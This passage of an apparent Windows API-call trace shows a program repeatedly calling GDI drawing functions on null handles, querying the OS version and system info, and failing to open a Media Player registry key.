| out: lpPaint=0x1817cc) returned 0x0 [0090.148] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.148] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.149] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.149] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.149] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.149] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2f0401dc [0090.149] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x310401d9 [0090.149] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104583f [0090.149] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045840 [0090.149] CombineRgn (hrgnDst=0x104583f, hrgnSrc1=0x2f0401dc, hrgnSrc2=0x310401d9, iMode=1) returned 1 [0090.149] CombineRgn (hrgnDst=0x1045840, hrgnSrc1=0x2f0401dc, hrgnSrc2=0x310401d9, iMode=4) returned 2 [0090.149] CreateSolidBrush (color=0xff) returned 0x210583e [0090.149] CreateSolidBrush (color=0xff0000) returned 0x1105841 [0090.149] DeleteObject (ho=0x1105841) returned 1 [0090.149] DeleteObject (ho=0x310401d9) returned 1 [0090.149] DeleteObject (ho=0x2f0401dc) returned 1 [0090.149] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.149] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.149] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.149] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.149] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.149] BeginPath (hdc=0x0) returned 0 [0090.149] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.149] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.149] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.149] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.149] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.149] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.150] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.150] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.150] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x320401d9 [0090.150] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x300401dc [0090.150] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045842 [0090.150] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045843 [0090.150] CombineRgn (hrgnDst=0x1045842, hrgnSrc1=0x320401d9, hrgnSrc2=0x300401dc, iMode=1) returned 1 [0090.150] CombineRgn (hrgnDst=0x1045843, hrgnSrc1=0x320401d9, hrgnSrc2=0x300401dc, iMode=4) returned 2 [0090.150] CreateSolidBrush (color=0xff) returned 0x2105841 [0090.150] CreateSolidBrush (color=0xff0000) returned 0x1105844 [0090.150] DeleteObject (ho=0x1105844) returned 1 [0090.150] DeleteObject (ho=0x300401dc) returned 1 [0090.150] DeleteObject (ho=0x320401d9) returned 1 [0090.150] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.150] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.150] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.150] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.150] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.150] BeginPath (hdc=0x0) returned 0 [0090.150] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.150] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.150] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.150] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.150] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.150] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.150] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.150] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.463] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x310401dc [0090.463] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x330401d9 [0090.463] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x95045845 [0090.463] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3045847 [0090.463] CombineRgn (hrgnDst=0x95045845, hrgnSrc1=0x310401dc, hrgnSrc2=0x330401d9, iMode=1) returned 1 [0090.463] CombineRgn (hrgnDst=0x3045847, hrgnSrc1=0x310401dc, hrgnSrc2=0x330401d9, iMode=4) returned 2 [0090.463] CreateSolidBrush (color=0xff) returned 0x2105844 [0090.464] CreateSolidBrush (color=0xff0000) returned 0xffffffff93105846 [0090.464] DeleteObject (ho=0x93105846) returned 1 [0090.464] DeleteObject (ho=0x330401d9) returned 1 [0090.464] DeleteObject (ho=0x310401dc) returned 1 [0090.464] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.464] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.464] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.464] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.464] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.464] BeginPath (hdc=0x0) returned 0 [0090.464] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.464] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.464] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.464] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.464] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.464] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.464] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.464] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.464] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x340401d9 [0090.464] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x320401dc [0090.464] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045848 [0090.464] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045849 [0090.464] CombineRgn (hrgnDst=0x1045848, hrgnSrc1=0x340401d9, hrgnSrc2=0x320401dc, iMode=1) returned 1 [0090.464] CombineRgn (hrgnDst=0x1045849, hrgnSrc1=0x340401d9, hrgnSrc2=0x320401dc, iMode=4) returned 2 [0090.464] CreateSolidBrush (color=0xff) returned 0x94105846 [0090.464] CreateSolidBrush (color=0xff0000) returned 0x110584a [0090.465] DeleteObject (ho=0x110584a) returned 1 [0090.465] DeleteObject (ho=0x320401dc) returned 1 [0090.465] DeleteObject (ho=0x340401d9) returned 1 [0090.465] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.465] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.465] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.465] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.465] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.465] BeginPath (hdc=0x0) returned 0 [0090.465] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.465] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.465] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.465] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.465] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.465] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.465] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.465] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.465] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x330401dc [0090.465] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x350401d9 [0090.465] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104584b [0090.465] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104584c [0090.465] CombineRgn (hrgnDst=0x104584b, hrgnSrc1=0x330401dc, hrgnSrc2=0x350401d9, iMode=1) returned 1 [0090.465] CombineRgn (hrgnDst=0x104584c, hrgnSrc1=0x330401dc, hrgnSrc2=0x350401d9, iMode=4) returned 2 [0090.465] CreateSolidBrush (color=0xff) returned 0x210584a [0090.465] CreateSolidBrush (color=0xff0000) returned 0x110584d [0090.465] DeleteObject (ho=0x110584d) returned 1 [0090.465] DeleteObject (ho=0x350401d9) returned 1 [0090.465] DeleteObject (ho=0x330401dc) returned 1 [0090.465] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.465] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.466] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.466] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.466] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.466] BeginPath (hdc=0x0) returned 0 [0090.466] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.466] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.466] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.466] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.466] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.466] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.466] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.466] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.466] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x360401d9 [0090.466] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x340401dc [0090.466] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104584e [0090.466] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104584f [0090.466] CombineRgn (hrgnDst=0x104584e, hrgnSrc1=0x360401d9, hrgnSrc2=0x340401dc, iMode=1) returned 1 [0090.466] CombineRgn (hrgnDst=0x104584f, hrgnSrc1=0x360401d9, hrgnSrc2=0x340401dc, iMode=4) returned 2 [0090.466] CreateSolidBrush (color=0xff) returned 0x210584d [0090.466] CreateSolidBrush (color=0xff0000) returned 0x1105850 [0090.466] DeleteObject (ho=0x1105850) returned 1 [0090.466] DeleteObject (ho=0x340401dc) returned 1 [0090.466] DeleteObject (ho=0x360401d9) returned 1 [0090.466] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.466] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.466] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.466] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.466] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.466] BeginPath (hdc=0x0) returned 0 [0090.467] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.467] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.467] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.467] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.467] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.467] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.467] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.467] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.467] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x350401dc [0090.467] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x370401d9 [0090.467] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045851 [0090.467] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045852 [0090.467] CombineRgn (hrgnDst=0x1045851, hrgnSrc1=0x350401dc, hrgnSrc2=0x370401d9, iMode=1) returned 1 [0090.467] CombineRgn (hrgnDst=0x1045852, hrgnSrc1=0x350401dc, hrgnSrc2=0x370401d9, iMode=4) returned 2 [0090.467] CreateSolidBrush (color=0xff) returned 0x2105850 [0090.467] CreateSolidBrush (color=0xff0000) returned 0x1105853 [0090.467] DeleteObject (ho=0x1105853) returned 1 [0090.467] DeleteObject (ho=0x370401d9) returned 1 [0090.467] DeleteObject (ho=0x350401dc) returned 1 [0090.467] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.467] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.467] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.467] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.467] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.467] BeginPath (hdc=0x0) returned 0 [0090.467] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.467] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.467] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.467] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.467] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.467] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.468] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.468] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.468] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x380401d9 [0090.468] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x360401dc [0090.468] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045854 [0090.468] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045855 [0090.468] CombineRgn (hrgnDst=0x1045854, hrgnSrc1=0x380401d9, hrgnSrc2=0x360401dc, iMode=1) returned 1 [0090.468] CombineRgn (hrgnDst=0x1045855, hrgnSrc1=0x380401d9, hrgnSrc2=0x360401dc, iMode=4) returned 2 [0090.468] CreateSolidBrush (color=0xff) returned 0x2105853 [0090.468] CreateSolidBrush (color=0xff0000) returned 0x1105856 [0090.468] DeleteObject (ho=0x1105856) returned 1 [0090.468] DeleteObject (ho=0x360401dc) returned 1 [0090.468] DeleteObject (ho=0x380401d9) returned 1 [0090.468] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.468] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.468] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.468] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.468] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.468] BeginPath (hdc=0x0) returned 0 [0090.468] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.468] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.468] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.468] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.468] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.468] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.468] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.468] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.469] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x370401dc [0090.469] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x390401d9 [0090.469] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045857 [0090.469] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045858 [0090.469] CombineRgn (hrgnDst=0x1045857, hrgnSrc1=0x370401dc, hrgnSrc2=0x390401d9, iMode=1) returned 1 [0090.469] CombineRgn (hrgnDst=0x1045858, hrgnSrc1=0x370401dc, hrgnSrc2=0x390401d9, iMode=4) returned 2 [0090.469] CreateSolidBrush (color=0xff) returned 0x2105856 [0090.469] CreateSolidBrush (color=0xff0000) returned 0x1105859 [0090.469] DeleteObject (ho=0x1105859) returned 1 [0090.469] DeleteObject (ho=0x390401d9) returned 1 [0090.469] DeleteObject (ho=0x370401dc) returned 1 [0090.469] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.469] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.469] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.469] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.469] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.469] BeginPath (hdc=0x0) returned 0 [0090.469] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.469] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.469] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.469] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.469] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.469] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.469] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.469] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.469] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3a0401d9 [0090.469] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x380401dc [0090.469] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104585a [0090.469] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104585b [0090.470] CombineRgn (hrgnDst=0x104585a, hrgnSrc1=0x3a0401d9, hrgnSrc2=0x380401dc, iMode=1) returned 1 [0090.470] CombineRgn (hrgnDst=0x104585b, hrgnSrc1=0x3a0401d9, hrgnSrc2=0x380401dc, iMode=4) returned 2 